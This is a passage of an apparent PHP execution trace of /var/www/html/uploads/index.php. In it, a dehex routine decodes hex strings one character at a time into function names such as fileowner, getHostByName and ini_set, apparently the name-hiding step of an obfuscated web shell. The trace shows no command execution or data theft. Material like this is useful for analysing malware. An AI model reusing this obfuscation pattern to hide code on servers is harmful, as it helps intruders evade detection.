2		A						/var/www/html/uploads/index.php	177	$i += 2
3	728	0	0.027016	584392	hexdec	0		/var/www/html/uploads/index.php	178	1	'69'
3	728	1	0.027028	584440
3	728	R			105
3	729	0	0.027041	584360	chr	0		/var/www/html/uploads/index.php	178	1	105
3	729	1	0.027052	584400
3	729	R			'i'
2		A						/var/www/html/uploads/index.php	178	$r .= 'i'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	730	0	0.027083	584392	hexdec	0		/var/www/html/uploads/index.php	178	1	'6e'
3	730	1	0.027095	584440
3	730	R			110
3	731	0	0.027109	584360	chr	0		/var/www/html/uploads/index.php	178	1	110
3	731	1	0.027120	584400
3	731	R			'n'
2		A						/var/www/html/uploads/index.php	178	$r .= 'n'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	732	0	0.027152	584392	hexdec	0		/var/www/html/uploads/index.php	178	1	'66'
3	732	1	0.027164	584440
3	732	R			102
3	733	0	0.027177	584360	chr	0		/var/www/html/uploads/index.php	178	1	102
3	733	1	0.027189	584400
3	733	R			'f'
2		A						/var/www/html/uploads/index.php	178	$r .= 'f'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	734	0	0.027221	584392	hexdec	0		/var/www/html/uploads/index.php	178	1	'6f'
3	734	1	0.027233	584440
3	734	R			111
3	735	0	0.027246	584360	chr	0		/var/www/html/uploads/index.php	178	1	111
3	735	1	0.027257	584400
3	735	R			'o'
2		A						/var/www/html/uploads/index.php	178	$r .= 'o'
2		A						/var/www/html/uploads/index.php	177	$i += 2
2	719	1	0.027289	584368
2	719	R			'pathinfo'
1		A						/var/www/html/uploads/index.php	8	$func[35] = 'pathinfo'
1		A						/var/www/html/uploads/index.php	7	$i++
2	736	0	0.027325	584368	dehex	1		/var/www/html/uploads/index.php	8	1	'66696c656f776e6572'
2		A						/var/www/html/uploads/index.php	175	$r = ''
2		A						/var/www/html/uploads/index.php	176	$len = 17
2		A						/var/www/html/uploads/index.php	177	$i = 0
3	737	0	0.027367	584400	hexdec	0		/var/www/html/uploads/index.php	178	1	'66'
3	737	1	0.027381	584448
3	737	R			102
3	738	0	0.027394	584368	chr	0		/var/www/html/uploads/index.php	178	1	102
3	738	1	0.027406	584408
3	738	R			'f'
2		A						/var/www/html/uploads/index.php	178	$r .= 'f'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	739	0	0.027438	584432	hexdec	0		/var/www/html/uploads/index.php	178	1	'69'
3	739	1	0.027450	584480
3	739	R			105
3	740	0	0.027462	584400	chr	0		/var/www/html/uploads/index.php	178	1	105
3	740	1	0.027474	584440
3	740	R			'i'
2		A						/var/www/html/uploads/index.php	178	$r .= 'i'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	741	0	0.027506	584432	hexdec	0		/var/www/html/uploads/index.php	178	1	'6c'
3	741	1	0.027519	584480
3	741	R			108
3	742	0	0.027531	584400	chr	0		/var/www/html/uploads/index.php	178	1	108
3	742	1	0.027543	584440
3	742	R			'l'
2		A						/var/www/html/uploads/index.php	178	$r .= 'l'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	743	0	0.027574	584432	hexdec	0		/var/www/html/uploads/index.php	178	1	'65'
3	743	1	0.027586	584480
3	743	R			101
3	744	0	0.027598	584400	chr	0		/var/www/html/uploads/index.php	178	1	101
3	744	1	0.027610	584440
3	744	R			'e'
2		A						/var/www/html/uploads/index.php	178	$r .= 'e'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	745	0	0.027641	584432	hexdec	0		/var/www/html/uploads/index.php	178	1	'6f'
3	745	1	0.027653	584480
3	745	R			111
3	746	0	0.027671	584400	chr	0		/var/www/html/uploads/index.php	178	1	111
3	746	1	0.027684	584440
3	746	R			'o'
2		A						/var/www/html/uploads/index.php	178	$r .= 'o'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	747	0	0.027715	584432	hexdec	0		/var/www/html/uploads/index.php	178	1	'77'
3	747	1	0.027726	584480
3	747	R			119
3	748	0	0.027739	584400	chr	0		/var/www/html/uploads/index.php	178	1	119
3	748	1	0.027750	584440
3	748	R			'w'
2		A						/var/www/html/uploads/index.php	178	$r .= 'w'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	749	0	0.027780	584432	hexdec	0		/var/www/html/uploads/index.php	178	1	'6e'
3	749	1	0.027792	584480
3	749	R			110
3	750	0	0.027805	584400	chr	0		/var/www/html/uploads/index.php	178	1	110
3	750	1	0.027816	584440
3	750	R			'n'
2		A						/var/www/html/uploads/index.php	178	$r .= 'n'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	751	0	0.027846	584432	hexdec	0		/var/www/html/uploads/index.php	178	1	'65'
3	751	1	0.027858	584480
3	751	R			101
3	752	0	0.027870	584400	chr	0		/var/www/html/uploads/index.php	178	1	101
3	752	1	0.027882	584440
3	752	R			'e'
2		A						/var/www/html/uploads/index.php	178	$r .= 'e'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	753	0	0.027912	584440	hexdec	0		/var/www/html/uploads/index.php	178	1	'72'
3	753	1	0.027923	584488
3	753	R			114
3	754	0	0.027936	584408	chr	0		/var/www/html/uploads/index.php	178	1	114
3	754	1	0.027947	584448
3	754	R			'r'
2		A						/var/www/html/uploads/index.php	178	$r .= 'r'
2		A						/var/www/html/uploads/index.php	177	$i += 2
2	736	1	0.027979	584408
2	736	R			'fileowner'
1		A						/var/www/html/uploads/index.php	8	$func[36] = 'fileowner'
1		A						/var/www/html/uploads/index.php	7	$i++
2	755	0	0.028013	584408	dehex	1		/var/www/html/uploads/index.php	8	1	'66696c6567726f7570'
2		A						/var/www/html/uploads/index.php	175	$r = ''
2		A						/var/www/html/uploads/index.php	176	$len = 17
2		A						/var/www/html/uploads/index.php	177	$i = 0
3	756	0	0.028054	584440	hexdec	0		/var/www/html/uploads/index.php	178	1	'66'
3	756	1	0.028066	584488
3	756	R			102
3	757	0	0.028079	584408	chr	0		/var/www/html/uploads/index.php	178	1	102
3	757	1	0.028090	584448
3	757	R			'f'
2		A						/var/www/html/uploads/index.php	178	$r .= 'f'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	758	0	0.028122	584472	hexdec	0		/var/www/html/uploads/index.php	178	1	'69'
3	758	1	0.028133	584520
3	758	R			105
3	759	0	0.028146	584440	chr	0		/var/www/html/uploads/index.php	178	1	105
3	759	1	0.028157	584480
3	759	R			'i'
2		A						/var/www/html/uploads/index.php	178	$r .= 'i'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	760	0	0.028187	584472	hexdec	0		/var/www/html/uploads/index.php	178	1	'6c'
3	760	1	0.028199	584520
3	760	R			108
3	761	0	0.028212	584440	chr	0		/var/www/html/uploads/index.php	178	1	108
3	761	1	0.028223	584480
3	761	R			'l'
2		A						/var/www/html/uploads/index.php	178	$r .= 'l'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	762	0	0.028254	584472	hexdec	0		/var/www/html/uploads/index.php	178	1	'65'
3	762	1	0.028266	584520
3	762	R			101
3	763	0	0.028278	584440	chr	0		/var/www/html/uploads/index.php	178	1	101
3	763	1	0.028290	584480
3	763	R			'e'
2		A						/var/www/html/uploads/index.php	178	$r .= 'e'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	764	0	0.028320	584472	hexdec	0		/var/www/html/uploads/index.php	178	1	'67'
3	764	1	0.028332	584520
3	764	R			103
3	765	0	0.028345	584440	chr	0		/var/www/html/uploads/index.php	178	1	103
3	765	1	0.028356	584480
3	765	R			'g'
2		A						/var/www/html/uploads/index.php	178	$r .= 'g'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	766	0	0.028387	584472	hexdec	0		/var/www/html/uploads/index.php	178	1	'72'
3	766	1	0.028401	584520
3	766	R			114
3	767	0	0.028414	584440	chr	0		/var/www/html/uploads/index.php	178	1	114
3	767	1	0.028425	584480
3	767	R			'r'
2		A						/var/www/html/uploads/index.php	178	$r .= 'r'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	768	0	0.028455	584472	hexdec	0		/var/www/html/uploads/index.php	178	1	'6f'
3	768	1	0.028467	584520
3	768	R			111
3	769	0	0.028479	584440	chr	0		/var/www/html/uploads/index.php	178	1	111
3	769	1	0.028490	584480
3	769	R			'o'
2		A						/var/www/html/uploads/index.php	178	$r .= 'o'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	770	0	0.028521	584472	hexdec	0		/var/www/html/uploads/index.php	178	1	'75'
3	770	1	0.028533	584520
3	770	R			117
3	771	0	0.028545	584440	chr	0		/var/www/html/uploads/index.php	178	1	117
3	771	1	0.028556	584480
3	771	R			'u'
2		A						/var/www/html/uploads/index.php	178	$r .= 'u'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	772	0	0.028586	584480	hexdec	0		/var/www/html/uploads/index.php	178	1	'70'
3	772	1	0.028598	584528
3	772	R			112
3	773	0	0.028610	584448	chr	0		/var/www/html/uploads/index.php	178	1	112
3	773	1	0.028622	584488
3	773	R			'p'
2		A						/var/www/html/uploads/index.php	178	$r .= 'p'
2		A						/var/www/html/uploads/index.php	177	$i += 2
2	755	1	0.028652	584448
2	755	R			'filegroup'
1		A						/var/www/html/uploads/index.php	8	$func[37] = 'filegroup'
1		A						/var/www/html/uploads/index.php	7	$i++
2	774	0	0.028686	584448	dehex	1		/var/www/html/uploads/index.php	8	1	'66696c6574797065'
2		A						/var/www/html/uploads/index.php	175	$r = ''
2		A						/var/www/html/uploads/index.php	176	$len = 15
2		A						/var/www/html/uploads/index.php	177	$i = 0
3	775	0	0.028728	584480	hexdec	0		/var/www/html/uploads/index.php	178	1	'66'
3	775	1	0.028739	584528
3	775	R			102
3	776	0	0.028752	584448	chr	0		/var/www/html/uploads/index.php	178	1	102
3	776	1	0.028763	584488
3	776	R			'f'
2		A						/var/www/html/uploads/index.php	178	$r .= 'f'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	777	0	0.028794	584512	hexdec	0		/var/www/html/uploads/index.php	178	1	'69'
3	777	1	0.028805	584560
3	777	R			105
3	778	0	0.028818	584480	chr	0		/var/www/html/uploads/index.php	178	1	105
3	778	1	0.028829	584520
3	778	R			'i'
2		A						/var/www/html/uploads/index.php	178	$r .= 'i'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	779	0	0.028860	584512	hexdec	0		/var/www/html/uploads/index.php	178	1	'6c'
3	779	1	0.028872	584560
3	779	R			108
3	780	0	0.028884	584480	chr	0		/var/www/html/uploads/index.php	178	1	108
3	780	1	0.028896	584520
3	780	R			'l'
2		A						/var/www/html/uploads/index.php	178	$r .= 'l'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	781	0	0.028931	584512	hexdec	0		/var/www/html/uploads/index.php	178	1	'65'
3	781	1	0.028943	584560
3	781	R			101
3	782	0	0.028956	584480	chr	0		/var/www/html/uploads/index.php	178	1	101
3	782	1	0.028967	584520
3	782	R			'e'
2		A						/var/www/html/uploads/index.php	178	$r .= 'e'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	783	0	0.028998	584512	hexdec	0		/var/www/html/uploads/index.php	178	1	'74'
3	783	1	0.029010	584560
3	783	R			116
3	784	0	0.029022	584480	chr	0		/var/www/html/uploads/index.php	178	1	116
3	784	1	0.029040	584520
3	784	R			't'
2		A						/var/www/html/uploads/index.php	178	$r .= 't'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	785	0	0.029071	584512	hexdec	0		/var/www/html/uploads/index.php	178	1	'79'
3	785	1	0.029083	584560
3	785	R			121
3	786	0	0.029096	584480	chr	0		/var/www/html/uploads/index.php	178	1	121
3	786	1	0.029107	584520
3	786	R			'y'
2		A						/var/www/html/uploads/index.php	178	$r .= 'y'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	787	0	0.029137	584512	hexdec	0		/var/www/html/uploads/index.php	178	1	'70'
3	787	1	0.029154	584560
3	787	R			112
3	788	0	0.029166	584480	chr	0		/var/www/html/uploads/index.php	178	1	112
3	788	1	0.029177	584520
3	788	R			'p'
2		A						/var/www/html/uploads/index.php	178	$r .= 'p'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	789	0	0.029254	584512	hexdec	0		/var/www/html/uploads/index.php	178	1	'65'
3	789	1	0.029267	584560
3	789	R			101
3	790	0	0.029280	584480	chr	0		/var/www/html/uploads/index.php	178	1	101
3	790	1	0.029291	584520
3	790	R			'e'
2		A						/var/www/html/uploads/index.php	178	$r .= 'e'
2		A						/var/www/html/uploads/index.php	177	$i += 2
2	774	1	0.029322	584488
2	774	R			'filetype'
1		A						/var/www/html/uploads/index.php	8	$func[38] = 'filetype'
1		A						/var/www/html/uploads/index.php	7	$i++
2	791	0	0.029357	584488	dehex	1		/var/www/html/uploads/index.php	8	1	'676574486f73744e616d65'
2		A						/var/www/html/uploads/index.php	175	$r = ''
2		A						/var/www/html/uploads/index.php	176	$len = 21
2		A						/var/www/html/uploads/index.php	177	$i = 0
3	792	0	0.029400	584520	hexdec	0		/var/www/html/uploads/index.php	178	1	'67'
3	792	1	0.029412	584568
3	792	R			103
3	793	0	0.029424	584488	chr	0		/var/www/html/uploads/index.php	178	1	103
3	793	1	0.029436	584528
3	793	R			'g'
2		A						/var/www/html/uploads/index.php	178	$r .= 'g'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	794	0	0.029467	584552	hexdec	0		/var/www/html/uploads/index.php	178	1	'65'
3	794	1	0.029479	584600
3	794	R			101
3	795	0	0.029491	584520	chr	0		/var/www/html/uploads/index.php	178	1	101
3	795	1	0.029503	584560
3	795	R			'e'
2		A						/var/www/html/uploads/index.php	178	$r .= 'e'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	796	0	0.029534	584552	hexdec	0		/var/www/html/uploads/index.php	178	1	'74'
3	796	1	0.029545	584600
3	796	R			116
3	797	0	0.029558	584520	chr	0		/var/www/html/uploads/index.php	178	1	116
3	797	1	0.029569	584560
3	797	R			't'
2		A						/var/www/html/uploads/index.php	178	$r .= 't'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	798	0	0.029599	584552	hexdec	0		/var/www/html/uploads/index.php	178	1	'48'
3	798	1	0.029611	584600
3	798	R			72
3	799	0	0.029623	584520	chr	0		/var/www/html/uploads/index.php	178	1	72
3	799	1	0.029635	584560
3	799	R			'H'
2		A						/var/www/html/uploads/index.php	178	$r .= 'H'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	800	0	0.029665	584552	hexdec	0		/var/www/html/uploads/index.php	178	1	'6f'
3	800	1	0.029677	584600
3	800	R			111
3	801	0	0.029689	584520	chr	0		/var/www/html/uploads/index.php	178	1	111
3	801	1	0.029701	584560
3	801	R			'o'
2		A						/var/www/html/uploads/index.php	178	$r .= 'o'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	802	0	0.029732	584552	hexdec	0		/var/www/html/uploads/index.php	178	1	'73'
3	802	1	0.029744	584600
3	802	R			115
3	803	0	0.029756	584520	chr	0		/var/www/html/uploads/index.php	178	1	115
3	803	1	0.029768	584560
3	803	R			's'
2		A						/var/www/html/uploads/index.php	178	$r .= 's'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	804	0	0.029798	584552	hexdec	0		/var/www/html/uploads/index.php	178	1	'74'
3	804	1	0.029810	584600
3	804	R			116
3	805	0	0.029822	584520	chr	0		/var/www/html/uploads/index.php	178	1	116
3	805	1	0.029834	584560
3	805	R			't'
2		A						/var/www/html/uploads/index.php	178	$r .= 't'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	806	0	0.029864	584552	hexdec	0		/var/www/html/uploads/index.php	178	1	'4e'
3	806	1	0.029876	584600
3	806	R			78
3	807	0	0.029888	584520	chr	0		/var/www/html/uploads/index.php	178	1	78
3	807	1	0.029900	584560
3	807	R			'N'
2		A						/var/www/html/uploads/index.php	178	$r .= 'N'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	808	0	0.029935	584560	hexdec	0		/var/www/html/uploads/index.php	178	1	'61'
3	808	1	0.029946	584608
3	808	R			97
3	809	0	0.029959	584528	chr	0		/var/www/html/uploads/index.php	178	1	97
3	809	1	0.029970	584568
3	809	R			'a'
2		A						/var/www/html/uploads/index.php	178	$r .= 'a'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	810	0	0.030001	584560	hexdec	0		/var/www/html/uploads/index.php	178	1	'6d'
3	810	1	0.030013	584608
3	810	R			109
3	811	0	0.030025	584528	chr	0		/var/www/html/uploads/index.php	178	1	109
3	811	1	0.030037	584568
3	811	R			'm'
2		A						/var/www/html/uploads/index.php	178	$r .= 'm'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	812	0	0.030067	584560	hexdec	0		/var/www/html/uploads/index.php	178	1	'65'
3	812	1	0.030080	584608
3	812	R			101
3	813	0	0.030092	584528	chr	0		/var/www/html/uploads/index.php	178	1	101
3	813	1	0.030103	584568
3	813	R			'e'
2		A						/var/www/html/uploads/index.php	178	$r .= 'e'
2		A						/var/www/html/uploads/index.php	177	$i += 2
2	791	1	0.030134	584528
2	791	R			'getHostName'
1		A						/var/www/html/uploads/index.php	8	$func[39] = 'getHostName'
1		A						/var/www/html/uploads/index.php	7	$i++
2	814	0	0.030169	584528	dehex	1		/var/www/html/uploads/index.php	8	1	'676574486f737442794e616d65'
2		A						/var/www/html/uploads/index.php	175	$r = ''
2		A						/var/www/html/uploads/index.php	176	$len = 25
2		A						/var/www/html/uploads/index.php	177	$i = 0
3	815	0	0.030211	584560	hexdec	0		/var/www/html/uploads/index.php	178	1	'67'
3	815	1	0.030223	584608
3	815	R			103
3	816	0	0.030235	584528	chr	0		/var/www/html/uploads/index.php	178	1	103
3	816	1	0.030247	584568
3	816	R			'g'
2		A						/var/www/html/uploads/index.php	178	$r .= 'g'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	817	0	0.030278	584592	hexdec	0		/var/www/html/uploads/index.php	178	1	'65'
3	817	1	0.030290	584640
3	817	R			101
3	818	0	0.030302	584560	chr	0		/var/www/html/uploads/index.php	178	1	101
3	818	1	0.030314	584600
3	818	R			'e'
2		A						/var/www/html/uploads/index.php	178	$r .= 'e'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	819	0	0.030344	584592	hexdec	0		/var/www/html/uploads/index.php	178	1	'74'
3	819	1	0.030356	584640
3	819	R			116
3	820	0	0.030368	584560	chr	0		/var/www/html/uploads/index.php	178	1	116
3	820	1	0.030380	584600
3	820	R			't'
2		A						/var/www/html/uploads/index.php	178	$r .= 't'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	821	0	0.030410	584592	hexdec	0		/var/www/html/uploads/index.php	178	1	'48'
3	821	1	0.030422	584640
3	821	R			72
3	822	0	0.030434	584560	chr	0		/var/www/html/uploads/index.php	178	1	72
3	822	1	0.030446	584600
3	822	R			'H'
2		A						/var/www/html/uploads/index.php	178	$r .= 'H'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	823	0	0.030476	584592	hexdec	0		/var/www/html/uploads/index.php	178	1	'6f'
3	823	1	0.030489	584640
3	823	R			111
3	824	0	0.030501	584560	chr	0		/var/www/html/uploads/index.php	178	1	111
3	824	1	0.030512	584600
3	824	R			'o'
2		A						/var/www/html/uploads/index.php	178	$r .= 'o'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	825	0	0.030543	584592	hexdec	0		/var/www/html/uploads/index.php	178	1	'73'
3	825	1	0.030555	584640
3	825	R			115
3	826	0	0.030567	584560	chr	0		/var/www/html/uploads/index.php	178	1	115
3	826	1	0.030578	584600
3	826	R			's'
2		A						/var/www/html/uploads/index.php	178	$r .= 's'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	827	0	0.030609	584592	hexdec	0		/var/www/html/uploads/index.php	178	1	'74'
3	827	1	0.030620	584640
3	827	R			116
3	828	0	0.030633	584560	chr	0		/var/www/html/uploads/index.php	178	1	116
3	828	1	0.030644	584600
3	828	R			't'
2		A						/var/www/html/uploads/index.php	178	$r .= 't'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	829	0	0.030678	584592	hexdec	0		/var/www/html/uploads/index.php	178	1	'42'
3	829	1	0.030690	584640
3	829	R			66
3	830	0	0.030703	584560	chr	0		/var/www/html/uploads/index.php	178	1	66
3	830	1	0.030714	584600
3	830	R			'B'
2		A						/var/www/html/uploads/index.php	178	$r .= 'B'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	831	0	0.030745	584600	hexdec	0		/var/www/html/uploads/index.php	178	1	'79'
3	831	1	0.030756	584648
3	831	R			121
3	832	0	0.030768	584568	chr	0		/var/www/html/uploads/index.php	178	1	121
3	832	1	0.030780	584608
3	832	R			'y'
2		A						/var/www/html/uploads/index.php	178	$r .= 'y'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	833	0	0.030811	584600	hexdec	0		/var/www/html/uploads/index.php	178	1	'4e'
3	833	1	0.030822	584648
3	833	R			78
3	834	0	0.030835	584568	chr	0		/var/www/html/uploads/index.php	178	1	78
3	834	1	0.030846	584608
3	834	R			'N'
2		A						/var/www/html/uploads/index.php	178	$r .= 'N'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	835	0	0.030876	584600	hexdec	0		/var/www/html/uploads/index.php	178	1	'61'
3	835	1	0.030887	584648
3	835	R			97
3	836	0	0.030899	584568	chr	0		/var/www/html/uploads/index.php	178	1	97
3	836	1	0.030911	584608
3	836	R			'a'
2		A						/var/www/html/uploads/index.php	178	$r .= 'a'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	837	0	0.030941	584600	hexdec	0		/var/www/html/uploads/index.php	178	1	'6d'
3	837	1	0.030953	584648
3	837	R			109
3	838	0	0.030965	584568	chr	0		/var/www/html/uploads/index.php	178	1	109
3	838	1	0.030976	584608
3	838	R			'm'
2		A						/var/www/html/uploads/index.php	178	$r .= 'm'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	839	0	0.031007	584600	hexdec	0		/var/www/html/uploads/index.php	178	1	'65'
3	839	1	0.031018	584648
3	839	R			101
3	840	0	0.031031	584568	chr	0		/var/www/html/uploads/index.php	178	1	101
3	840	1	0.031042	584608
3	840	R			'e'
2		A						/var/www/html/uploads/index.php	178	$r .= 'e'
2		A						/var/www/html/uploads/index.php	177	$i += 2
2	814	1	0.031073	584568
2	814	R			'getHostByName'
1		A						/var/www/html/uploads/index.php	8	$func[40] = 'getHostByName'
1		A						/var/www/html/uploads/index.php	7	$i++
2	841	0	0.031108	584568	dehex	1		/var/www/html/uploads/index.php	8	1	'737562737472'
2		A						/var/www/html/uploads/index.php	175	$r = ''
2		A						/var/www/html/uploads/index.php	176	$len = 11
2		A						/var/www/html/uploads/index.php	177	$i = 0
3	842	0	0.031149	584600	hexdec	0		/var/www/html/uploads/index.php	178	1	'73'
3	842	1	0.031161	584648
3	842	R			115
3	843	0	0.031173	584568	chr	0		/var/www/html/uploads/index.php	178	1	115
3	843	1	0.031185	584608
3	843	R			's'
2		A						/var/www/html/uploads/index.php	178	$r .= 's'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	844	0	0.031215	584632	hexdec	0		/var/www/html/uploads/index.php	178	1	'75'
3	844	1	0.031227	584680
3	844	R			117
3	845	0	0.031239	584600	chr	0		/var/www/html/uploads/index.php	178	1	117
3	845	1	0.031251	584640
3	845	R			'u'
2		A						/var/www/html/uploads/index.php	178	$r .= 'u'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	846	0	0.031281	584632	hexdec	0		/var/www/html/uploads/index.php	178	1	'62'
3	846	1	0.031293	584680
3	846	R			98
3	847	0	0.031306	584600	chr	0		/var/www/html/uploads/index.php	178	1	98
3	847	1	0.031317	584640
3	847	R			'b'
2		A						/var/www/html/uploads/index.php	178	$r .= 'b'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	848	0	0.031347	584632	hexdec	0		/var/www/html/uploads/index.php	178	1	'73'
3	848	1	0.031359	584680
3	848	R			115
3	849	0	0.031371	584600	chr	0		/var/www/html/uploads/index.php	178	1	115
3	849	1	0.031382	584640
3	849	R			's'
2		A						/var/www/html/uploads/index.php	178	$r .= 's'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	850	0	0.031416	584632	hexdec	0		/var/www/html/uploads/index.php	178	1	'74'
3	850	1	0.031428	584680
3	850	R			116
3	851	0	0.031440	584600	chr	0		/var/www/html/uploads/index.php	178	1	116
3	851	1	0.031452	584640
3	851	R			't'
2		A						/var/www/html/uploads/index.php	178	$r .= 't'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	852	0	0.031482	584632	hexdec	0		/var/www/html/uploads/index.php	178	1	'72'
3	852	1	0.031493	584680
3	852	R			114
3	853	0	0.031506	584600	chr	0		/var/www/html/uploads/index.php	178	1	114
3	853	1	0.031517	584640
3	853	R			'r'
2		A						/var/www/html/uploads/index.php	178	$r .= 'r'
2		A						/var/www/html/uploads/index.php	177	$i += 2
2	841	1	0.031547	584600
2	841	R			'substr'
1		A						/var/www/html/uploads/index.php	8	$func[41] = 'substr'
1		A						/var/www/html/uploads/index.php	7	$i++
2	854	0	0.031580	584600	dehex	1		/var/www/html/uploads/index.php	8	1	'737472737472'
2		A						/var/www/html/uploads/index.php	175	$r = ''
2		A						/var/www/html/uploads/index.php	176	$len = 11
2		A						/var/www/html/uploads/index.php	177	$i = 0
3	855	0	0.031621	584632	hexdec	0		/var/www/html/uploads/index.php	178	1	'73'
3	855	1	0.031632	584680
3	855	R			115
3	856	0	0.031644	584600	chr	0		/var/www/html/uploads/index.php	178	1	115
3	856	1	0.031655	584640
3	856	R			's'
2		A						/var/www/html/uploads/index.php	178	$r .= 's'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	857	0	0.031686	584664	hexdec	0		/var/www/html/uploads/index.php	178	1	'74'
3	857	1	0.031697	584712
3	857	R			116
3	858	0	0.031710	584632	chr	0		/var/www/html/uploads/index.php	178	1	116
3	858	1	0.031721	584672
3	858	R			't'
2		A						/var/www/html/uploads/index.php	178	$r .= 't'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	859	0	0.031752	584664	hexdec	0		/var/www/html/uploads/index.php	178	1	'72'
3	859	1	0.031764	584712
3	859	R			114
3	860	0	0.031776	584632	chr	0		/var/www/html/uploads/index.php	178	1	114
3	860	1	0.031788	584672
3	860	R			'r'
2		A						/var/www/html/uploads/index.php	178	$r .= 'r'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	861	0	0.031818	584664	hexdec	0		/var/www/html/uploads/index.php	178	1	'73'
3	861	1	0.031830	584712
3	861	R			115
3	862	0	0.031842	584632	chr	0		/var/www/html/uploads/index.php	178	1	115
3	862	1	0.031854	584672
3	862	R			's'
2		A						/var/www/html/uploads/index.php	178	$r .= 's'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	863	0	0.031884	584664	hexdec	0		/var/www/html/uploads/index.php	178	1	'74'
3	863	1	0.031895	584712
3	863	R			116
3	864	0	0.031907	584632	chr	0		/var/www/html/uploads/index.php	178	1	116
3	864	1	0.031919	584672
3	864	R			't'
2		A						/var/www/html/uploads/index.php	178	$r .= 't'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	865	0	0.031949	584664	hexdec	0		/var/www/html/uploads/index.php	178	1	'72'
3	865	1	0.031960	584712
3	865	R			114
3	866	0	0.031973	584632	chr	0		/var/www/html/uploads/index.php	178	1	114
3	866	1	0.031984	584672
3	866	R			'r'
2		A						/var/www/html/uploads/index.php	178	$r .= 'r'
2		A						/var/www/html/uploads/index.php	177	$i += 2
2	854	1	0.032014	584632
2	854	R			'strstr'
1		A						/var/www/html/uploads/index.php	8	$func[42] = 'strstr'
1		A						/var/www/html/uploads/index.php	7	$i++
2	867	0	0.032048	584632	dehex	1		/var/www/html/uploads/index.php	8	1	'696e695f736574'
2		A						/var/www/html/uploads/index.php	175	$r = ''
2		A						/var/www/html/uploads/index.php	176	$len = 13
2		A						/var/www/html/uploads/index.php	177	$i = 0
3	868	0	0.032089	584664	hexdec	0		/var/www/html/uploads/index.php	178	1	'69'
3	868	1	0.032101	584712
3	868	R			105
3	869	0	0.032114	584632	chr	0		/var/www/html/uploads/index.php	178	1	105
3	869	1	0.032129	584672
3	869	R			'i'
2		A						/var/www/html/uploads/index.php	178	$r .= 'i'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	870	0	0.032161	584696	hexdec	0		/var/www/html/uploads/index.php	178	1	'6e'
3	870	1	0.032173	584744
3	870	R			110
3	871	0	0.032186	584664	chr	0		/var/www/html/uploads/index.php	178	1	110
3	871	1	0.032197	584704
3	871	R			'n'
2		A						/var/www/html/uploads/index.php	178	$r .= 'n'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	872	0	0.032228	584696	hexdec	0		/var/www/html/uploads/index.php	178	1	'69'
3	872	1	0.032240	584744
3	872	R			105
3	873	0	0.032252	584664	chr	0		/var/www/html/uploads/index.php	178	1	105
3	873	1	0.032264	584704
3	873	R			'i'
2		A						/var/www/html/uploads/index.php	178	$r .= 'i'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	874	0	0.032294	584696	hexdec	0		/var/www/html/uploads/index.php	178	1	'5f'
3	874	1	0.032306	584744
3	874	R			95
3	875	0	0.032319	584664	chr	0		/var/www/html/uploads/index.php	178	1	95
3	875	1	0.032330	584704
3	875	R			'_'
2		A						/var/www/html/uploads/index.php	178	$r .= '_'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	876	0	0.032361	584696	hexdec	0		/var/www/html/uploads/index.php	178	1	'73'
3	876	1	0.032373	584744
3	876	R			115
3	877	0	0.032385	584664	chr	0		/var/www/html/uploads/index.php	178	1	115
3	877	1	0.032397	584704
3	877	R			's'
2		A						/var/www/html/uploads/index.php	178	$r .= 's'
